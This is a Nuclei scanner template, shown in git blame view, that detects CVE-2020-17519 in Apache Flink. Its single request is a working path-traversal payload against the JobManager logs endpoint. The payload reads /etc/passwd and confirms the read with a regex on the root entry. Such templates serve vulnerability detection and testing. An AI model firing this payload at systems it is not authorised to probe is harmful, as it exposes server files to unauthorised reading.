nuclei-templates/http/cves/2020/CVE-2020-17519.yaml

40 lines
1.5 KiB
YAML
Raw Normal View History

2021-01-06 07:08:41 +00:00
id: CVE-2020-17519
info:
name: Apache Flink - Local File Inclusion
2021-04-06 06:46:11 +00:00
author: pdteam
2021-01-06 07:08:41 +00:00
severity: high
description: Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process (aka local file inclusion).
reference:
- https://github.com/B1anda0/CVE-2020-17519
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d%40%3Cdev.flink.apache.org%3E
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cdev.flink.apache.org%3E
- https://lists.apache.org/thread.html/r6843202556a6d0bce9607ebc02e303f68fc88e9038235598bde3b50d@%3Cuser.flink.apache.org%3E
- https://nvd.nist.gov/vuln/detail/CVE-2020-17519
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-17519
cwe-id: CWE-552
cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:*
epss-score: 0.97486
tags: cve,cve2020,apache,lfi,flink
metadata:
max-request: 1
2021-01-06 07:08:41 +00:00
http:
2021-01-06 07:08:41 +00:00
- method: GET
path:
- "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-01-06 07:08:41 +00:00
part: body
# Enhanced by mp on 2022/07/13